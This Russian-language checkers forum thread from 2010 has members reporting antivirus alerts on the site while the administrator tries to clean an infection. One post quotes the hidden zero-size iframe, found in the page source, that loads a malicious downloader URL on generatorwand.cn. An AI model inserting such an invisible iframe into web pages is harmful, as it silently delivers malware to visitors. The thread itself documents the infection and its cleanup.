Автор |
Сообщение |
Symix |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 02:21 AM
|
|
Зарегистрирован: Мар 11, 2004
Сообщений: 2097
Откуда : Hollywood, Florida
|
|
Зaшел на shashki.com
Мой avasр на одном компютере бьет тревогу
Win32:Rootkit-gen [Rtk] Malware
потом сайт захотел инстoлать програму из Индии
CA (Computer Associates) не показывает проблем.
Публичный компютер в клубе пускает на сайт но обьявляет вирусу на любом линке форума. |
|
|
|
|
|
Symix |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 05:23 AM
|
|
Зарегистрирован: Мар 11, 2004
Сообщений: 2097
Откуда : Hollywood, Florida
|
|
Специально поехал в клуб проверять. Не знаю какой там антивирус. На этот топик допустила, на Задачки от Бужинского нет. Говорит "identity theft" - но это она всегда говорит о сайте shashki.com. Но вот послать ответ оттуда не смог, сайт отказал. |
|
|
|
|
|
Fenix |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 06:42 AM
|
|
Зарегистрирован: Сен 01, 2002
Сообщений: 8715
|
|
Забавно.
А у меня просто Опера сама закрывается. |
_________________ love is an answer
|
|
|
|
|
A.Presman |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 08:26 AM
|
|
Зарегистрирован: Авг 31, 2002
Сообщений: 537
|
|
Касперский говорит.
detected: Trojan program Trojan-Downloader.Java.OpenStream.af file: http://generatorwand.cn//0.icq/myf/y/LoaderX.class
Когда он это сказал я посмотрел сурс странички. А там скрытый iframe.
Код:
<iframe src="http://generatorwand.cn//index.php?s=b49f084d83d6446674ea76bf78e8c9dc" width="0" height="0" frameborder="0"></iframe>
Это он. |
|
|
|
|
|
AlexanderS |
|
Тема сообщения: Re: Вирус на сайте.
Отправлено: Янв 08, 2010 - 09:44 AM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
|
|
|
AlexanderS |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 02:11 PM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
Alkand писал(а): Вот же... просмотрел самую первую строку с ифрэймом привык, что вирусы дописывают себя в конец файла.
Вроде теперь должно быть чисто. Просто совпало, что сразу два (надеюсь, не больше) вируса залезло...
На страницы форума антивирус больше не ругается, но главная страница и любой article - все равно вылазит тот же вирус. Хотя после лечения IE уже открывает страницы |
|
|
|
|
|
AlexanderS |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 02:15 PM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
|
|
|
Alkand |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 06:28 PM
|
|
Зарегистрирован: Июль 16, 2002
Сообщений: 3653
Откуда : Москва
|
|
Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно |
_________________ Aurora Borealis - единственный инструментарий для истинных профессионалов
|
|
|
|
|
AlexanderS |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 08:06 PM
|
|
Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
|
|
Alkand писал(а): Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно
Не-а :( Все равно вылазит. Не на всех, но на большинстве страниц. Кэш на всякий случай очистил так что уверен что тянется с сайта... |
|
|
|
|
|
ALGIMANTAS |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 10:31 PM
|
|
Зарегистрирован: Авг 27, 2002
Сообщений: 5766
|
|
По моему, "вирус" и в добавлений комментариев к текстам на новостной ленте..
Хотел добавить комментарий к теме на новостной ленте о чекерсе. Три раза пробовал - "не проходит". Если это только для "профессоров", простите, не надо. Никто, кроме нескольких фанатиков, не будет затруднять себя.
г.Александру - сотрите там мои неудачные попытки. Из - за уважения к dammen (этот коллега заметный на этом Форуме), короткий свой ответ ему даю здесь (извиняюсь перед г.Александром за off top):
To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška |
|
|
|
|
|
dammen |
|
Тема сообщения:
Отправлено: Янв 08, 2010 - 11:15 PM
|
|
Зарегистрирован: Июнь 19, 2008
Сообщений: 240
|
|
ALGIMANTAS писал(а):
To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška
Благодарю Вас за ответ, господин ALGIMANTAS!
С этим отчётом я ознакомился до ГА, а отсутствие официальных лиц от WCDF вероятно, объясняется неизвестными нам вескими причинами. Надеюсь, alemo внесёт ясность в вопросах взаимоотношений WCDF и FMJD, календаря WCDF-2010 и турнира претендентов в Ирландии. |
|
|
|
|
|
uvf25 |
|
Тема сообщения:
Отправлено: Янв 09, 2010 - 05:24 AM
|
|
Зарегистрирован: Окт 27, 2006
Сообщений: 75
|
|
Мой "Касперский" уже третий день обнаруживает и нейтрализует на главной странице при первом входе:
09.01.2010 10:20:52 Обнаружено: Trojan.Win32.Fregee.a Ujjgnlsuw Tszqovwfmgjegjwzc C:\TEMP\8E.tmp
Затем всё работает нормально. |
|
|
|
|
|
Натуля |
|
Тема сообщения:
Отправлено: Янв 10, 2010 - 09:59 AM
|
|
Зарегистрирован: Май 24, 2004
Сообщений: 161
|
|
опять этот уродец |
|
|
|
|
|
Натуля |
|
Тема сообщения:
Отправлено: Янв 10, 2010 - 10:02 AM
|
|
Зарегистрирован: Май 24, 2004
Сообщений: 161
|
|
троянская программа Trojan.Win32.Fregee.a
вылез в теме ЧМ по 100 в Берлине
ps опять принудительный перезагруз(((((( стока всего открыто нужного))) |
|
|
|
|
|
berg |
|
Тема сообщения:
Отправлено: Янв 10, 2010 - 07:38 PM
|
|
Зарегистрирован: Сен 21, 2005
Сообщений: 353
Откуда : Минск
|
|
Доктор сказал:"C:\Documents and Settings\G....o\Local Settings\Temporary Internet Files\Content.IE5\8RNTSG08\Dtp1NZuedRL2cE34[1].pdf\data001 - инфицирован JS.DownLoader.85"
Два дня назад был другой.
Александр Борисович, это похоже на наезд |
|
|
|
|
|
|